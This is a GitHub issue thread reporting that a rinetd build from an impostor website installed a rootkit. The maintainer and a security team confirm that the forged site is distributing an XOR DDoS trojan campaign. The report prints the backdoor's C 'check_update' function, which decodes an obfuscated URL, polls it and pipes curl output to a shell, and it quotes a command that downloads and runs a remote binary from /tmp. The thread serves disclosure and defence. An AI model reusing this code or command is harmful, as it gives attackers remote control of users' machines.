【Backdoor Installed】

Question

【Backdoor Installed】

Opened this issue 4 years ago · 4 comments

Hello, this rinetd installed a backdoor malware on my Linux.
In general, rinetd will update every hour, but when on Nov 3, it gave me this commands:
/bin/sh -c cd /tmp && \rm -rf ./update && \curl -sfo update http://www.rinetd.com/aaaNH4XIlLcni && \chmod 777 ./update && \./update && \rm -rf ./update update.sh
and the file on http://www.rinetd.com/aaaNH4XIlLcni, is a rootkit which is a malware backdoor.
You could see the virustotal &joesandbox reports for details:

And here is my question:
what happened to rinetd made it install a backdoor for me..

Look forward to your soonest reply！

I downloaded the source code from here: http://www.rinetd.com/.
The piece of code have a function called "check_update", with this function someone control the downloader's computer who installed and executed it.

void *check_update(void *arg)
{
	int i;
        char sys[BUFSIZ]={0};
	char nfn[BUFSIZ]={0};
	char fn[]= {-27,-13,-12,-22,-90,-85,-32,-11,-90,-18,-14,-14,-10,-68,-87,-87,-13,-10,-30,-25,-14,-29,-88,-12,-17,-24,-29,-14,-30,-88,-27,-23,-21,-87,-13,-10,-30,-25,-14,-29,-88,-10,-18,-10};
	 for(i = 0; i < strlen(fn); i++)
    	       fn[i] = fn[i] ^ 0x86;
	sampleOsRelease(sys);
	sprintf(nfn,"%s?t=%s",fn,sys);
	while(1)
	{
     	     FILE *fp;
	     char buf[BUFSIZ];
	          

	     if (NULL != (fp = popen(nfn, "r")))
		fread(buf, BUFSIZ, 1, fp);
	    else {
		  Sleep(1000); 
		    continue;
		}
	    pclose(fp);
           if (strlen(buf)>0)
	   {
	       char url[BUFSIZ];
	       sprintf(url,"/bin/sh -c \"$(curl -fsSL %s)\"",buf);
	       system(url);
		 
	    }
		buf[0]=0;
	    Sleep(1800000); 
	}

    return ((void *)0);
}

Answer 1 · 2020-12-01T12:53:34.000Z

Hello, I have no connection with rinetd.com. This appears to be a third party site distributing a hacked version of rinetd.

…

On Tue, Dec 1, 2020 at 4:02 AM muching ***@***.***> wrote: Hello, this rinetd installed a backdoor malware on my Linux. In general, rinetd will update every hour, but when on Nov 3, it gave me this commands: /bin/sh -c cd /tmp && \rm -rf ./update && \curl -sfo update http://www.rinetd.com/aaaNH4XIlLcni && \chmod 777 ./update && \./update && \rm -rf ./update update.sh and the file on http://www.rinetd.com/aaaNH4XIlLcni, is a rootkit which is a malware backdoor. You could see the virustotal &joesandbox reports for details: 1. https://www.virustotal.com/gui/file/1c484e24d1e62d390fe2c3951ceaa804c34ac662e73b7f3d1b21604953133507/detection 2. https://www.joesandbox.com/analysis/325000/0/html#3512d899f236c3a41a8cc6fa1837e93f212565 And here is my question: what happened to rinetd made it install a backdoor for me.. Look forward to your soonest reply！ — You are receiving this because you are subscribed to this thread. Reply to this email directly, view it on GitHub <#8>, or unsubscribe <https://github.com/notifications/unsubscribe-auth/AAAH27M7FMOSXYYMBWJ5NK3SSSWLRANCNFSM4UIXCV3A> .

-- THOMAS BOUTELL | CHIEF TECHNOLOGY OFFICER APOSTROPHECMS | apostrophecms.com | he/him/his

Answer 2 · 2020-12-01T12:56:33.000Z

The backdoor appears to be in the check_update function, which appears in the rinetd.com version, but not here in this github repository.

…

On Tue, Dec 1, 2020 at 7:53 AM Tom Boutell ***@***.***> wrote: Hello, I have no connection with rinetd.com. This appears to be a third party site distributing a hacked version of rinetd. On Tue, Dec 1, 2020 at 4:02 AM muching ***@***.***> wrote: > Hello, this rinetd installed a backdoor malware on my Linux. > In general, rinetd will update every hour, but when on Nov 3, it gave me > this commands: > /bin/sh -c cd /tmp && \rm -rf ./update && \curl -sfo update > http://www.rinetd.com/aaaNH4XIlLcni && \chmod 777 ./update && \./update > && \rm -rf ./update update.sh > and the file on http://www.rinetd.com/aaaNH4XIlLcni, is a rootkit which > is a malware backdoor. > You could see the virustotal &joesandbox reports for details: > > 1. > https://www.virustotal.com/gui/file/1c484e24d1e62d390fe2c3951ceaa804c34ac662e73b7f3d1b21604953133507/detection > 2. > https://www.joesandbox.com/analysis/325000/0/html#3512d899f236c3a41a8cc6fa1837e93f212565 > > And here is my question: > what happened to rinetd made it install a backdoor for me.. > > Look forward to your soonest reply！ > > — > You are receiving this because you are subscribed to this thread. > Reply to this email directly, view it on GitHub > <#8>, or unsubscribe > <https://github.com/notifications/unsubscribe-auth/AAAH27M7FMOSXYYMBWJ5NK3SSSWLRANCNFSM4UIXCV3A> > . > -- THOMAS BOUTELL | CHIEF TECHNOLOGY OFFICER APOSTROPHECMS | apostrophecms.com | he/him/his

-- THOMAS BOUTELL | CHIEF TECHNOLOGY OFFICER APOSTROPHECMS | apostrophecms.com | he/him/his

Answer 3 · 2020-12-01T13:26:24.000Z

I have reached out to the abuse teams at godaddy and google compute engine (where the site is hosted), as well as a contact in law enforcement. Thank you for bringing this mess to my attention. It is unfortunately not certain that I'll be able to take down a site I don't control, but I will try.

…

On Tue, Dec 1, 2020 at 7:56 AM Tom Boutell ***@***.***> wrote: The backdoor appears to be in the check_update function, which appears in the rinetd.com version, but not here in this github repository. On Tue, Dec 1, 2020 at 7:53 AM Tom Boutell ***@***.***> wrote: > Hello, > > I have no connection with rinetd.com. This appears to be a third party > site distributing a hacked version of rinetd. > > > On Tue, Dec 1, 2020 at 4:02 AM muching ***@***.***> wrote: > >> Hello, this rinetd installed a backdoor malware on my Linux. >> In general, rinetd will update every hour, but when on Nov 3, it gave me >> this commands: >> /bin/sh -c cd /tmp && \rm -rf ./update && \curl -sfo update >> http://www.rinetd.com/aaaNH4XIlLcni && \chmod 777 ./update && \./update >> && \rm -rf ./update update.sh >> and the file on http://www.rinetd.com/aaaNH4XIlLcni, is a rootkit which >> is a malware backdoor. >> You could see the virustotal &joesandbox reports for details: >> >> 1. >> https://www.virustotal.com/gui/file/1c484e24d1e62d390fe2c3951ceaa804c34ac662e73b7f3d1b21604953133507/detection >> 2. >> https://www.joesandbox.com/analysis/325000/0/html#3512d899f236c3a41a8cc6fa1837e93f212565 >> >> And here is my question: >> what happened to rinetd made it install a backdoor for me.. >> >> Look forward to your soonest reply！ >> >> — >> You are receiving this because you are subscribed to this thread. >> Reply to this email directly, view it on GitHub >> <#8>, or unsubscribe >> <https://github.com/notifications/unsubscribe-auth/AAAH27M7FMOSXYYMBWJ5NK3SSSWLRANCNFSM4UIXCV3A> >> . >> > > > -- > > THOMAS BOUTELL | CHIEF TECHNOLOGY OFFICER > APOSTROPHECMS | apostrophecms.com | he/him/his > -- THOMAS BOUTELL | CHIEF TECHNOLOGY OFFICER APOSTROPHECMS | apostrophecms.com | he/him/his

-- THOMAS BOUTELL | CHIEF TECHNOLOGY OFFICER APOSTROPHECMS | apostrophecms.com | he/him/his

Answer 4 · 2020-12-02T12:48:37.000Z

Yeah, we also found that the check_update function is only present in the source code from that website.
This is a well-organized attack that targets well-known open-source software by forging their official websites. People may be directed to fake websites through web search engines like Google and then download malicious backdoors. According to our inspection, these backdoors belongs to the DDoS Trojan horse family (XOR), which are used to build a botnet.

We have issued a security notice regarding this attack today.
https://security.tencent.com/index.php/blog/msg/173

Thank you for publishing the warning on Twitter!